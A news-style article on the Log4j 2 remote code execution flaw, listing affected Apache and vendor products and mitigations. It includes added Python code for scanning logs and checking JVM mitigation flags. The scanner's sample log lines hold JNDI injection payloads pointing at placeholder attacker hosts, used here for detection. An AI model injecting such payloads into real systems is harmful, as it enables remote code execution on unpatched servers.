About 17 Apache projects are affected by the Log4j 2 vulnerability


In recent days there has been a lot of discussion on the net about the Log4j vulnerability, for which several attack vectors and a number of different exploits have been found.

What makes the issue so serious is that Log4j is a popular framework for organizing logging in Java applications, and the flaw allows arbitrary code to be executed whenever a specially formatted value of the form "{jndi:URL}" is written to the log. The attack can be carried out against any Java application that logs values obtained from external sources, for example by echoing problematic values in error messages.

In practice, an attacker sends an HTTP request to the target system, which logs it using Log4j 2; the logged value makes Log4j use JNDI to issue a request to a site controlled by the attacker. The vulnerability then causes the exploited process to contact that site and load a payload from it. In many of the observed attacks, the attacker-controlled parameter points at a DNS logging service, intended only to record the request so that vulnerable systems can be identified.
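A defender's first question is whether any logged, attacker-supplied field (request path, User-Agent, headers) carried one of these lookup expressions. The following scanner is an added example, not code from the original article: it extracts every `${...}` expression from a line (honouring nested braces) and reports those that contain a `jndi:` URL together with its scheme and host. The log lines and hostnames are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (not from the article); hosts are placeholders.
SAMPLE_LINES = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:03 +0000] "GET /login HTTP/1.1" 200 128 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [11/Dec/2021:10:01:04 +0000] "GET /${jndi:dns://probe.example/x} HTTP/1.1" '
    '404 0 "-" "curl/7.79"',
]

# A jndi lookup carries a URL; capture its scheme (ldap, rmi, dns, ...) and host.
JNDI_RE = re.compile(r'jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}]+)', re.IGNORECASE)


@dataclass
class Hit:
    line_no: int
    expression: str
    scheme: str
    host: str


def extract_lookups(text):
    """Return every ${...} expression in text, keeping nested braces balanced."""
    found, i = [], 0
    while (start := text.find('${', i)) >= 0:
        depth = 0
        for j in range(start, len(text)):
            if text[j] == '{':
                depth += 1
            elif text[j] == '}':
                depth -= 1
                if depth == 0:
                    found.append(text[start:j + 1])
                    i = j + 1
                    break
        else:
            break  # unbalanced expression: nothing more to extract
    return found


def scan_line(line_no, line):
    """Return a Hit for every jndi lookup expression found in one log line."""
    hits = []
    for expr in extract_lookups(line):
        if (m := JNDI_RE.search(expr)):
            hits.append(Hit(line_no, expr, m['scheme'].lower(), m['host']))
    return hits


def scan(lines):
    """Scan a sequence of log lines; line numbers are 1-based."""
    return [h for n, line in enumerate(lines, 1) for h in scan_line(n, line)]
```

Run over a real access log, the dns-scheme hits correspond to the scanning probes the article describes, while ldap/rmi hits point at hosts that should be checked for outbound connections from the JVM.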

As our colleague Isaac has already shared:

This Log4j vulnerability allows exploiting improper input validation in LDAP, which permits remote code execution (RCE) and the compromise of the server (confidentiality, data integrity and system availability). Moreover, the importance of this vulnerability lies in the number of applications and servers that use it, including enterprise software and cloud services such as Apple iCloud and Steam, popular video games such as Minecraft: Java Edition, Twitter, Cloudflare, Tencent, ElasticSearch, Redis, Elastic Logstash, and many more.

On this subject, the Apache Software Foundation recently published a post summarizing the projects affected by the critical vulnerability in Log4j 2 that allows arbitrary code to run on the server.

The following Apache projects are affected: Archiva, Druid, EventMesh, Flink, Fortress, Geode, Hive, JMeter, Jena, JSPWiki, OFBiz, Ozone, SkyWalking, Solr, Struts, TrafficControl, and Calcite Avatica. The vulnerability also affected GitHub products, including GitHub.com, GitHub Enterprise Cloud, and GitHub Enterprise Server.

In recent days there has been a sharp rise in activity related to exploitation of the vulnerability. For example, Check Point recorded about 100 exploitation attempts per minute against its honeypot servers at the peak, and Sophos announced the discovery of a new cryptocurrency-mining botnet built from systems with the unpatched Log4j 2 vulnerability.

Regarding the information published about the problem:

  • The vulnerability has been confirmed in many official Docker images, including the couchbase, elasticsearch, flink, solr and storm images, among others.
  • The vulnerability is present in the MongoDB Atlas Search product.
  • The problem appears in various Cisco products, including Cisco Webex Meetings Server, Cisco CX Cloud Agent, Cisco Advanced Web Security Reporting, Cisco Firepower Threat Defense (FTD), Cisco Identity Services Engine (ISE), Cisco CloudCenter, Cisco DNA Center, Cisco BroadWorks, and others.
  • The problem is present in the IBM WebSphere Application Server and in the following Red Hat products: OpenShift, OpenShift Logging, OpenStack Platform, Integration Camel, CodeReady Studio, Data Grid, Fuse, and AMQ Streams.
  • The issue is confirmed in Junos Space Network Management Platform, Northstar Controller/Planner, and Paragon Insights/Pathfinder/Planner.
  • Many products from Oracle, VMware, Broadcom, and Amazon are also affected.

Apache projects not affected by the Log4j 2 vulnerability: Apache Iceberg, Guacamole, Hadoop, Log4Net, Spark, Tomcat, ZooKeeper, and CloudStack.

Users of the affected packages are advised to install the updates released for them immediately, to update the Log4j 2 version separately, or to set the log4j2.formatMsgNoLookups parameter to true (for example, by adding the "-Dlog4j2.formatMsgNoLookups=true" option at startup).

To lock down a vulnerable system to which there is no direct access, it has been proposed to use the Logout4Shell "vaccine", which exploits the vulnerability itself to apply the Java settings "log4j2.formatMsgNoLookups=true", "com.sun.jndi.rmi.object.trustURLCodebase=false" and "com.sun.jndi.cosnaming.object.trustURLCodebase=false", thereby preventing further exploitation of the vulnerability on systems that cannot otherwise be managed.
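Whether the mitigation was applied by hand at startup or by the vaccine described above, the result is a set of JVM system properties, and an operator wants a quick way to confirm they are really set. The check below is an added example, not the article's or any project's code: it parses the `-D` properties from a JVM launch line and reports each of the three properties the article names as ok, missing or carrying the wrong value. The command lines are constructed for the example; note that system property names are case-sensitive, so a mis-typed key such as `Log4j2.formatMsgNoLookup` is reported as missing.

```python
import shlex

# The three JVM system properties the article names as mitigations and the value each needs.
REQUIRED_PROPERTIES = {
    "log4j2.formatMsgNoLookups": "true",
    "com.sun.jndi.rmi.object.trustURLCodebase": "false",
    "com.sun.jndi.cosnaming.object.trustURLCodebase": "false",
}


def parse_jvm_properties(cmdline):
    """Collect -Dkey=value pairs from a JVM command line, honouring shell quoting."""
    props = {}
    for tok in shlex.split(cmdline):
        if tok.startswith("-D"):
            key, _, value = tok[2:].partition("=")
            props[key] = value
    return props


def check_mitigations(cmdline):
    """Return {property: status}, status being 'ok', 'missing' or 'wrong:<value>'."""
    props = parse_jvm_properties(cmdline)
    report = {}
    for key, wanted in REQUIRED_PROPERTIES.items():
        if key not in props:                      # property names are case-sensitive
            report[key] = "missing"
        elif props[key].strip().lower() == wanted:  # Java parses booleans case-insensitively
            report[key] = "ok"
        else:
            report[key] = f"wrong:{props[key]}"
    return report


def is_mitigated(cmdline):
    """True only when all three properties are present with the expected value."""
    return all(status == "ok" for status in check_mitigations(cmdline).values())


# Constructed launch lines (not from the article): the weak one beside the corrected one.
WEAK_CMDLINE = 'java -Xmx2g -jar app.jar'
HARDENED_CMDLINE = ('java -Xmx2g -Dlog4j2.formatMsgNoLookups=true '
                    '-Dcom.sun.jndi.rmi.object.trustURLCodebase=false '
                    '-Dcom.sun.jndi.cosnaming.object.trustURLCodebase=false -jar app.jar')

if __name__ == "__main__":
    for name, cmd in (("weak", WEAK_CMDLINE), ("hardened", HARDENED_CMDLINE)):
        print(name, check_mitigations(cmd))
```

The formatMsgNoLookups property is only honoured by Log4j 2.10 and later, so this check complements, rather than replaces, the version upgrade the article recommends.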

